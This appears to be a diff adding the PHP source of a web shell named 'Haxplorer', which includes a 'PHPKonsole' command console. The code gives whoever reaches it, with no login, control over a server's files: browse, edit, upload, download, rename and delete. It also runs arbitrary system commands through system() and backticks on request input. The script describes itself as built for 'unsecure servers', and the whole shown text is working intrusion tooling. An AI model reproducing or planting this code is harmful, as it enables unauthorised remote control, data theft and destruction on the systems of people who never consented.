+          <td NOWRAP class="silver border noleft">
+
+	   &nbsp;Actions&nbsp;(Attempt to perform)&nbsp;
+
+	  </td>
+
+          <td NOWRAP class="silver border noleft">
+
+	   &nbsp;Size&nbsp;
+
+	  </td>
+
+          <td width=1 NOWRAP class="silver border noleft">
+
+	   &nbsp;Attributes&nbsp;
+
+	  </td>
+
+          <td NOWRAP class="silver border noleft">
+
+	   &nbsp;Modification Date&nbsp;
+
+	  </td>
+
+	 <tr>
+
+    <?php
+
+
+
+
+
+      	/* <!-- This whole heap of junk is the sorting section... */
+
+
+
+ 	$dirn 	= array();
+
+ 	$filen 	= array();
+
+ 	$filesizes	= 0;
+
+ 	while ($buf = readdir($h)) {
+
+	    if (is_dir("$dir/$buf"))
+
+			$dirn[] = $buf;
+
+    		else 
+
+ 			$filen[] = $buf;
+
+    	}	 	
+
+		$dirno 	= count($dirn) + 1;
+
+ 		$fileno	= count($filen) + 1;
+
+
+
+  		function mycmp($a, $b){
+
+			if ($a == $b) return 0;
+
+			return (strtolower($a) < strtolower($b)) ? -1 : 1;
+
+		}
+
+
+
+		if (function_exists("usort")) {
+
+			usort($dirn, "mycmp");
+
+			usort($filen, "mycmp");
+
+		}
+
+		else {
+
+			sort ($dirn);
+
+	 		sort ($filen);
+
+	 	}
+
+	reset ($dirn);
+
+ 	reset ($filen);
+
+ 	if (function_exists('array_merge')) {
+
+		$filelist = array_merge ($dirn, $filen);
+
+	}
+
+ 	else {
+
+		$filelist = $dirn + $filen;
+
+	}
+
+
+
+	
+
+	if ( count($filelist)-1 > $Pmax ) {
+
+		$from = $Pidx * $Pmax;
+
+		$to = ($Pidx + 1) * $Pmax-1;
+
+		if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
+
+			$to = count($filelist) - 1;
+
+		if ($to > count($filelist)-1)
+
+			$to = count($filelist)-1;
+
+		$Dcontents = array();
+
+		For ($Fi = $from; $Fi <= $to; $Fi++) {
+
+			$Dcontents[] = $filelist[$Fi];	
+
+		}
+
+
+
+	}
+
+	else {
+
+		$Dcontents = $filelist;
+
+	}
+
+	
+
+     $tdcolors = array("lighttd", "darktd");
+
+
+
+     while (list ($key, $file) = each ($Dcontents)) {
+
+          if (!$tdcolor=arrval(each($tdcolors))) {
+
+	    reset($tdcolors);
+
+	    $tdcolor = arrval(each($tdcolors));	  }
+
+	  	         
+
+ 		if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
+
+          			/* <!-- Dirname --> */
+
+			echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
+
+  				/* <!-- Actions --> */
+
+			echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
+
+ 				/* <!-- Rename --> */
+
+			if ( ($file != ".") && ($file != "..") )
+
+				echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+
+ 				/* <!-- Delete --> */
+
+			if ( ($file != ".") && ($file != "..") )
+
+				echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+
+				/* <!-- End of Actions --> */
+
+			echo "&nbsp;&nbsp;</center></td>\n";
+
+  				/* <!-- Size --> */
+
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
+
+ 				/* <!-- Attributes --> */
+
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+
+ 			echo "<strong>D</strong>";
+
+		        if ( @is_readable("$dir/$file") ) {
+
+   				echo "<strong>R</strong>";
+
+ 			}
+
+ 			if (function_exists('is_writeable')) {
+
+				if ( @is_writeable("$dir/$file") ) {
+
+ 					echo "<strong>W</stong>";
+
+ 				}
+
+			}
+
+ 			else {
+
+    				echo "<strong>(W)</stong>";
+
+  			}
+
+  			if ( @is_executable("$dir/$file") ) {
+
+ 				echo "<Strong>X<strong>";
+
+ 			}
+
+ 			echo "&nbsp;&nbsp;</td>\n";
+
+ 				/* <!-- Date --> */
+
+			echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+
+ 			echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+
+ 			echo "</td>";
+
+			echo "</tr>\n";
+
+
+
+        	}
+
+  		else { /* <!-- Then it must be a File... --> */
+
+     				/* <!-- Filename --> */
+
+			if ( @is_readable("$dir/$file") )
+
+ 				echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
+
+  			else
+
+  				echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
+
+  			   				/* <!-- Actions --> */
+
+			echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
+
+ 				/* <!-- Rename --> */
+
+			echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+
+  				/* <!-- Edit --> */
+
+			if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+
+ 				echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
+
+   				/* <!-- Copy --> */
+
+ 			echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
+
+  				/* <!-- Move --> */
+
+			if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+
+ 					echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
+
+    				/* <!-- Delete --> */
+
+			echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+
+ 				/* <!-- Download --> */
+
+			echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
+
+ 				/* <!-- Execute --> */
+
+			if ( @is_executable("$dir/$file") )
+
+ 				echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
+
+    				/* <!-- End of Actions --> */
+
+			echo sp(2)."</center></td>\n";
+
+ 				/* <!-- Size --> */
+
+			echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
+
+ 			$size = @filesize("$dir/$file");
+
+ 			If ($size != false) {
+
+			        $filesizes += $size;
+
+				echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
+
+			}
+
+			else
+
+				echo "&nbsp;&nbsp;<strong>0 B<strong>";
+
+ 			echo "&nbsp;&nbsp;</td>\n";
+
+
+
+ 				/* <!-- Attributes --> */
+
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+
+
+
+ 			if ( @is_readable("$dir/$file") )
+
+ 				echo "<strong>R</strong>";
+
+   			if ( @is_writeable("$dir/$file") )
+
+ 				echo "<strong>W</stong>";
+
+   			if ( @is_executable("$dir/$file") )
+
+ 				echo "<Strong>X<strong>";
+
+   			if (function_exists('is_uploaded_file')){
+
+ 				if ( @is_uploaded_file("$dir/$file") )
+
+ 					echo "<Strong>U<strong>";
+
+ 			}
+
+ 			else {
+
+				echo "<Strong>(U)<strong>";
+
+			}
+
+ 			echo "&nbsp;&nbsp;</td>\n";
+
+			 	/* <!-- Date --> */
+
+			echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+
+ 			echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+
+ 			echo "</td>";
+
+ 			echo "</tr>\n";
+
+ 		}
+
+  	}
+
+
+
+    	echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
+
+  	echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Dir(s),&nbsp;".@count ($filen)."&nbsp;File(s)&nbsp;&nbsp;\n";
+
+  	echo "</td><td NOWRAP class=\"silver border noleft\">\n";
+
+  	echo "&nbsp;&nbsp;Total filesize:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
+
+	
+
+	function printpagelink($a, $b, $link = ""){
+
+		if ($link != "") 
+
+			echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
+
+		else
+
+			echo "<b>| $a - $b |</b>";
+
+	}
+
+        
+
+	if ( count($filelist)-1 > $Pmax ) {
+
+		echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
+
+		$Fi = 0;
+
+		while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
+
+			$from = $Fi*$Pmax;
+
+			while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+
+			$to = ($Fi + 1) * $Pmax - 1;
+
+			if ($Fi == $Pidx)
+
+				$link="";
+
+			else 
+
+				$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+
+			printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
+
+			echo "&nbsp;&nbsp;&nbsp;";
+
+			$Fi++;
+
+		}
+
+		$from = $Fi*$Pmax;
+
+		while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+
+		$to = count($filelist)-1;
+
+		if ($Fi == $Pidx)
+
+			$link="";
+
+		else 
+
+			$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+
+		printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);		
+
+		
+
+	
+
+		echo "</center></td></tr></table></td></tr>";
+
+	}
+
+
+
+
+
+    	echo "</table>\n<br><table NOWRAP>";
+
+
+
+  	if ($isGoodver) {
+
+		echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
+
+	}
+
+ 	else {
+
+		echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
+
+	}
+
+      		/* <!-- Other Actions --> */
+
+   	echo "<tr><td class=\"silver border\">&nbsp;<strong>Other actions:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
+
+  	echo "<td>&nbsp;<b>".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+
+	                     buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+
+			     buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
+
+    	echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
+
+  	echo "<tr><td class=\"silver border\">&nbsp;<strong>Your IP:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
+
+  	echo "<tr><td class=\"silver border\">&nbsp;<strong>Browsing Directory:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
+
+  	echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Legend:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
+
+  	echo "<table NOWRAP>";
+
+        echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Directory.</td></tr>\n";
+
+   	echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Readable.</td></tr>\n";
+
+  	echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Writeable.</td></tr>\n";
+
+  	echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Executable.</td></tr>\n";
+
+  	echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
+
+  	echo "</table></td>";
+
+ 	echo "</table>";
+
+ 	echo "<br>";
+
+     	@closedir($h);
+
+  }
+
+  elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
+
+ 	echo system("$file");
+
+ }
+
+elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
+
+	echo "<center><table><tr><td NOWRAP>" ;
+
+ 	if ($auth == "yes") {
+
+		if (Mydeldir($file)==false) {
+
+ 			echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
+
+  		}
+
+ 		else {
+
+ 			echo "Successfully removed \"$file\"<br>";
+
+ 		}
+
+ 		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
+
+	}
+
+ 	else {
+
+		echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
+
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+
+        <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
+
+     	<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+
+     	<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+
+     	<input type=\"hidden\" name=\"file\" value=\"$file\">
+
+     	<input type=\"hidden\" name=\"auth\" value=\"yes\">
+
+     	<input type=\"submit\" value=\"Yes\"></form>
+
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+
+	<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+
+	<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+
+	<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+
+        }
+
+ 	echo "</td></tr></center>";
+
+}
+
+ elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */	echo "<center><table><tr><td NOWRAP>" ;
+
+ 	if ($auth == "yes") {
+
+		if (@unlink($file)==false) {
+
+ 			echo "Could not remove \"$file\"<br>";
+
+  		}
+
+ 		else {
+
+ 			echo "Successfully removed \"$file\"<br>";
+
+ 		}
+
+		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
+
+        }
+
+ 	else {
+
+       	echo "Are you sure you want to delete \"$file\" ?
+
+      	<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+
+     	<input type=\"hidden\" name=\"cmd\" value=\"delfile\">
+
+     	<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+
+     	<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+
+     	<input type=\"hidden\" name=\"file\" value=\"$file\">
+
+     	<input type=\"hidden\" name=\"auth\" value=\"yes\">
+
+
+
+     	<input type=\"submit\" value=\"Yes\"></form>
+
+       	<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+
+	<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+
+	<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+
+	<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+
+        }
+
+ 	echo "</td></tr></center>";
+
+}
+
+elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
+
+	echo "<center><table><tr><td NOWRAP>";
+
+ 	$i = 1;
+
+ 	while (file_exists("$lastdir/newfile$i.txt"))
+
+ 		$i++;
+
+ 	$file = fopen("$lastdir/newfile$i.txt", "w+");
+
+ 	if ($file == false)
+
+ 		echo "Could not create the new file...<br>";
+
+ 	else
+
+ 		echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
+
+ 		echo "
+
+   			<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+
+			<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+
+			<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+
+			<input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
+
+			</form></center>
+
+ 			</td></tr></table></center>   		";
+
+	}
+
+elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
+
+	echo "<center><table><tr><td NOWRAP>" ;
+
+ 	$i = 1;
+
+ 	while (is_dir("$lastdir/newdir$i"))
+
+  		$i++;
+
+ 	$file = mkdir("$lastdir/newdir$i", 0777);
+
+ 	if ($file == false)
+
+ 		echo "Could not create the new directory...<br>";
+
+ 	else
+
+ 		echo "Successfully created: \"$lastdir/newdir$i\"<br>";
+
+ 	echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+
+		<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+
+		<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+
+		<input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
+
+		</form></center></td></tr></table></center>";
+
+}
+
+elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
+
+	$contents = "";
+
+	$fc = @file( $file );
+
+  	while ( @list( $ln, $line ) = each( $fc ) ) {
+
+  		$contents .= htmlentities( $line ) ;
+
+ 	}
+
+ 	echo "<br><center><table><tr><td NOWRAP>";
+
+	echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+
+	echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
+
+	echo "<strong>EDIT FILE: </strong>$file<br>\n";
+
+	echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
+
+	echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
+
+	echo "<input type=\"submit\" value=\"Save\">";
+
+	echo "</form>";
+
+	echo "</td></tr></table></center>";
+
+}
+
+elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
+
+	$fo = fopen($file, "w");
+
+	$wrret = fwrite($fo, stripslashes($contents));
+
+	$clret = fclose($fo);
+
+}
+
+elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
+
+	$downloadfile = urldecode($file);
+
+	if (function_exists("basename"))
+
+    		$downloadto = basename ($downloadfile);
+
+	else
+
+		$downloadto = "download.ext";
+
+	if (!file_exists("$downloadfile"))
+
+		echo "The file does not exist";
+
+	else {
+
+		$size = @filesize("$downloadfile");
+
+		if ($size != false) {
+
+			$add="; size=$size";
+
+		}			
+
+		else {
+
+			$add="";
+
+		}
+
+ 		header("Content-Type: application/download");
+
+		header("Content-Disposition: attachment; filename=$downloadto$add");
+
+		$fp=fopen("$downloadfile" ,"rb");
+
+		fpassthru($fp);
+
+		flush();
+
+	}
+
+}
+
+elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ 
+
+   	?>
+
+	<center>
+
+	 <table>
+
+	  <tr>
+
+	   <td NOWRAP>
+
+    		Welcome to the upload section...
+
+ 		Please note that the destination file will be
+
+		<br> overwritten if it already exists!!!<br><br>
+
+ 		<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
+
+ 			<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
+
+ 			<input type="hidden" name="cmd" value="uploadproc">
+
+ 			<input type="hidden" name="dir" value="<?php echo $dir ?>">
+
+ 			<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
+
+ 			<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
+
+ 			Select local file:<br>
+
+ 			<input size="75" name="userfile" type="file"><br>
+
+ 			<input type="submit" value="Send File">
+
+ 		</form>
+
+		<br>
+
+ 		<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
+
+			<input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
+
+			<input type="hidden" name="dir" value="<?php echo $lastdir ?>">
+
+			<input tabindex="0" type="submit" value="Cancel">
+
+		</form>
+
+	   </td>
+
+	  </tr>
+
+	 </table>
+
+	</center>
+
+
+
+ 	<?php
+
+}
+
+elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
+
+	echo "<center><table><tr><td NOWRAP>";
+
+	if (file_exists($userfile))
+
+		$res = copy($userfile, "$dir/$userfile_name");
+
+	echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
+
+     	if ($res) {
+
+		echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
+
+		echo "Local filename: \"$userfile_name\".\n<br>Remote filename: \"$userfile\".\n<br>";
+
+		echo "Filesize: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
+
+	}
+
+	else {
+
+		echo "Could not move uploaded file; Action aborted...";
+
+	}
+
+	echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
+
+	echo "<br><br></td></tr></table></center>";
+
+}
+
+elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
+
+        echo "<hr>"; 
+
+	$fc = @file( $file );  	while ( @list( $ln, $line ) = each( $fc ) ) {
+
+  		echo spacetonbsp(@htmlentities($line))."<br>\n";
+
+  	}
+
+	echo "<hr>";
+
+}
+
+elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
+
+     	if (function_exists('is_dir')) {
+
+ 		if (is_dir("$oldfile")) {
+
+ 			$objname = "Directory";
+
+ 			$objident = "Directory";
+
+  		}
+
+ 		else {
+
+ 			$objname = "Filename";
+
+ 			$objident = "file";
+
+ 		}
+
+ 	}
+
+   	echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
+
+	If (empty($newfile) != true) {
+
+ 		echo "<center>";
+
+	 	$return = @rename($oldfile, "$olddir$newfile");
+
+		if ($return) {
+
+ 			echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
+
+ 		}
+
+ 		else {
+
+ 			if ( @file_exists("$olddir$newfile") ) {
+
+ 				echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
+
+ 			}
+
+ 			else {
+
+ 				echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
+
+ 			}
+
+  		}
+
+ 		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
+
+ 	}
+
+ 	else {
+
+ 		$dpos = strrpos($oldfile, "/");
+
+ 		if (strval($dpos)!="") {
+
+ 			$olddir = substr($oldfile, 0, $dpos+1);
+
+   		}
+
+ 		else {
+
+ 			$olddir = "$lastdir/";
+
+		}
+
+ 		$fpos = strrpos($oldfile, "/");
+
+ 		if (strval($fpos)!="") {
+
+ 			$inputfile = substr($oldfile, $fpos+1);
+
+   		}
+
+ 		else {
+
+	 		$inputfile = "";
+
+ 		}
+
+       		echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+
+ 		echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
+
+ 		echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
+
+ 		echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
+
+ 		echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
+
+ 		echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
+
+ 		echo "Rename \"$oldfile\" to:<br>\n";
+
+ 		echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; 
+
+		echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
+
+ 		echo "</td></tr></table></center>";
+
+ 	}
+
+}
+
+else if ( $cmd == "con") {
+
+
+
+?>
+
+<center>
+
+<table>
+
+ <tr><td>
+
+<h3>PHPKonsole</h3>
+
+
+
+<?php
+
+
+
+if (ini_get('register_globals') != '1') {
+
+    if (!empty($HTTP_POST_VARS))
+
+	extract($HTTP_POST_VARS);
+
+	  
+
+    if (!empty($HTTP_GET_VARS))
+
+	extract($HTTP_GET_VARS);
+
+	      
+
+    if (!empty($HTTP_SERVER_VARS))
+
+	extract($HTTP_SERVER_VARS);
+
+    }
+
+		    
+
+    if (!empty($work_dir)) {
+
+	if (!empty($command)) {
+
+	    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+
+	        if ($regs[1][0] == '/') {
+
+	            $new_dir = $regs[1];
+
+		} else {
+
+		    $new_dir = $work_dir . '/' . $regs[1];
+
+		}
+
+		if (file_exists($new_dir) && is_dir($new_dir)) {
+
+		    $work_dir = $new_dir;
+
+		}
+
+		unset($command);
+
+	    }
+
+	}
+
+    }
+
+    if (file_exists($work_dir) && is_dir($work_dir)) {
+
+	chdir($work_dir);
+
+    }
+
+    $work_dir = exec('pwd');
+
+?>
+
+
+
+    <form name="myform" action="<?php echo "$PHP_SELF?$urlAdd" ?>" method="post">
+
+	<table border=0 cellspacing=0 cellpadding=0 width="100%"><tr><td>Current working directory: <b>
+
+	<input type="hidden" name="cmd" value="con">
+
+	<?php
+
+	    $work_dir_splitted = explode('/', substr($work_dir, 1));
+
+	    printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=/">Root</a>/', $PHP_SELF, $stderr);
+
+	    if (!empty($work_dir_splitted[0])) {
+
+		$path = '';
+
+		for ($i = 0; $i < count($work_dir_splitted); $i++) {
+
+		    $path .= '/' . $work_dir_splitted[$i];
+
+		    printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=%s">%s</a>/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]);
+
+		}
+
+	    }
+
+	?></b></td>
+
+	<td align="right">Choose new working directory: <select class="inputtext" name="work_dir" onChange="this.form.submit()">
+
+	
+
+	<?php
+
+	$dir_handle = opendir($work_dir);
+
+	while ($dir = readdir($dir_handle)) {
+
+	    if (is_dir($dir)) {
+
+		if ($dir == '.') {
+
+		    echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+
+		} elseif ($dir == '..') {
+
+		    if (strlen($work_dir) == 1) {
+
+		    }
+
+		    elseif (strrpos($work_dir, '/') == 0) {
+
+			echo "<option value=\"/\">Parent Directory</option>\n";
+
+		    } else {
+
+			echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+
+		    }
+
+		} else {
+
+		    if ($work_dir == '/') {
+
+			echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+
+		    } else {
+
+			echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+
+		    }
+
+		}
+
+	    }
+
+	}
+
+	closedir($dir_handle);
+
+	?>
+
+	</select></td></tr></table>
+
+	<p>Command: <input class="inputtext" type="text" name="command" size="60">
+
+	<input name="submit_btn" class="inputbutton" type="submit" value="Execute Command"></p>
+
+	<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"<?php if (($stderr) || (!isset($stderr)) ) echo " CHECKED"; ?>></p>
+
+	<textarea cols="80" rows="19" class="inputtextarea" wrap=off readonly><?php
+
+	    if (!empty($command)) {
+
+	        echo "phpKonsole> ". htmlspecialchars($command) . "\n\n"; 
+
+		if ($stderr) {
+
+		    $tmpfile = tempnam('/tmp', 'phpshell');
+
+		    $command .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile";
+
+		} else if ($command == 'ls') {
+
+		    $command .= ' -F';
+
+		}
+
+		$output = `$command`;
+
+		echo htmlspecialchars($output);
+
+	    }
+
+	?></textarea>
+
+    </form>
+
+																													      
+
+    <script language="JavaScript" type="text/javascript">
+
+	document.forms[0].command.focus();
+
+    </script>
+
+ </td></tr></table>
+
+<?php
+
+}    
+
+else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
+
+	$isMainMenu = true;
+
+     ?>
+
+	<table width="100%" border="0" cellpadding="0" cellspacing="0">
+
+	 <tr>
+
+	  <td width="100%" class="border">
+
+	   <center>&nbsp;.:: <?php echo $scriptTitle ?> Main Menu ::.&nbsp;</center>
+
+	  </td>
+
+	 </tr>
+
+	</table>
+
+	<br>
+
+ 	<center>
+
+	<table border="0" NOWRAP>
+
+ 	 <tr>
+
+	  <td valign="top" class="silver border">
+
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> Haxplorer <==</strong></font>", "cmd=dir&dir=.").sp(2); ?>
+
+	  </td>
+
+ 	  <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
+
+	   Haxplorer is a server side file browser wich (ab)uses the directory object to list
+
+ 	   the files and directories stored on a webserver. This handy tools allows you to manage
+
+ 	   files and directories on a unsecure server with php support.<br><br>This entire script
+
+ 	   is coded for unsecure servers, if your server is secured the script will hide commands
+
+ 	   or will even return errors to your browser...<br><br>
+
+	  </td>
+
+	 </tr>
+
